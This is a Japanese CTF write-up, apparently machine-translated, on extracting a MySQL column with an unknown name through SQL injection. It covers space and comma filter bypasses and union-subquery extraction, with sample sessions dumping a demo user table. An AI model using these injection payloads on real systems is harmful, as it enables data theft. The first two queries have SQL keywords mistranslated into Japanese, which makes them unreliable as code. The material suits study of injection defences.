MySQL で不明なフィールド名を回避する方法
|
序文 この記事では、DDCTF の 5 番目の質問、つまり不明なフィールド名をバイパスする手法を紹介します。ここでは、ローカル マシンを使用して操作します。アイデアは素晴らしく明確です。皆さんと共有してください。詳細な紹介を見てみましょう。 実装のアイデア この質問はスペースとカンマをフィルタリングします。スペースは、%0a、%0b、%0c、%0d、%a0、または括弧を直接使用してバイパスできます。カンマは join を使用してバイパスできます。 フラグを格納するフィールド名が不明であり、information_schema.columns もテーブル名の 16 進数をフィルタリングするため、フィールド名を取得できません。この場合、結合クエリを使用できます。プロセスは次のようになります。 アイデアは、フラグを取得して、それを既知のフィールド名の下に表示することです。 サンプルコード: mysql> (選択 1)a、(選択 2)b、(選択 3)c、(選択 4)d を選択します。 +---+---+---+---+ | a | b | c | d | +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ セット内の 1 行 (0.00 秒) mysql> (選択 1)a、(選択 2)b、(選択 3)c、(選択 4)d から * を選択します。 +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ セット内の 1 行 (0.00 秒) mysql> select * from (select 1)a、(select 2)b、(select 3)c、(select 4)d union select * from user; +---+-------+----------+-------------+ | 1 | 2 | 3 | 4 | +---+-------+----------+-------------+ | 1 | 2 | 3 | 4 | | 1 | 管理者 | admin888 | [email protected] | | 2 | テスト | test123 | [email protected] | | 3 | cs | cs123 | [email protected] | +---+-------+----------+-------------+ セット内の 4 行 (0.01 秒) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e; +-------------+ | 4 | +-------------+ | 4 | | [email protected] | | [email protected] | | [email protected] | +-------------+ セット内の4行(0.03秒) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3; +-------------+ | 4 | +-------------+ | [email protected] | +-------------+ セット内の1行(0.01秒) mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i; +-------------+-----------+-----------+-------------+ | ID | ユーザー名 | パスワード | メール | +-------------+-----------+-----------+-------------+ | 1 | 管理者 | admin888 | [email protected] | | [email protected] | 1 | 1 | 1 | +-------------+-----------+-----------+-------------+ セットに2行(0.04秒) 要約する 上記はこの記事の全内容です。この記事の内容が皆さんの勉強や仕事に少しでもお役に立てれば幸いです。ご質問があれば、メッセージを残してコミュニケーションしてください。123WORDPRESS.COM をご愛顧いただき、ありがとうございます。 以下もご興味があるかもしれません:
|
<<: TomcatはNginxリバースプロキシのクライアントドメイン名を取得します
>>: jsはjQueryをカプセル化する簡単な方法とチェーン操作の詳細な説明を実装します
推薦する
CSS での配置の使用方法の詳細な研究 (要約)
CSS における位置指定の概要position属性は英語で位置を意味し、 CSSでの主な機能は要素...
Linux で同じバージョンの R を使用して Seurat2 と Seurat3 を同時にインストールするチュートリアル
Seurat は、単一細胞解析用の重量級の R パッケージです。使用したことがある人なら誰でも、その...
Vue データの応答性の概要
データの応答性について話す前に、Vue はデータに対して具体的に何を行うのかという非常に重要な問題を...
英語のシングルクォーテーション「''」を含むSQLの記述の失敗について徹底解説
問題が発生しました。情報の編集をテストする際、編集した内容に一重引用符 (') が含まれてい...
JavaScript マクロタスクとマイクロタスクの実行順序についての簡単な説明
目次1. JavaScriptはシングルスレッドです1. 同期タスク2. 非同期タスク2. タスクキ...
両側にCSS固定レイアウト、中央に適応レイアウトを実装
フローティング、フローティング埋め込み div、配置、フレックスという 4 つの一般的な方法と原則を...
Apacheドメイン名設定の落とし穴の詳細な説明
私はApacheを使ったことがありません。仕事を始めてからはずっとnginxを使っていました(運用保...
MySQL ファントムリードとその排除方法の詳細な説明
目次トランザクション分離レベルファントムリーディングとは何ですか?ファントムリードを排除する方法要約...
この構成ファイルの排他ロックに失敗したという VMware 仮想マシンのプロンプトの解決方法
VMware が異常シャットダウンした後、再起動すると「この構成ファイルを排他的にロックできませんで...
MySQL データ型の詳細
目次1. 数値型1.1 数値型の分類1.1.1 浮動小数点数1.1.2 ビットタイプ1.1.3 時間...
MySQL の最初のインストールが成功した後にパスワードを初期化する手順
ファイルをディレクトリに解凍しますこれは解凍後のディレクトリですmy.iniファイルを入力しますダブ...
ランダムロールコールテーブルを実装するためのネイティブJavaScript
この記事では、JavaScriptのランダムロールコールテーブルの具体的なコードを参考までに紹介しま...
React の国際化 react-intl の使用
React で国際化を実現するにはどうすればよいでしょうか? react-intlプラグインは、Re...
MySQL 全体または単一のテーブルデータのエクスポート
単一のテーブルをエクスポートするmysqldump -u ユーザー -p db名 テーブル名 >...
Windows 10 64 ビット版に MySQL 5.6.35 をインストールするためのグラフィック チュートリアル
1. MySQL Community Server 5.6.35をダウンロードするダウンロードアドレ...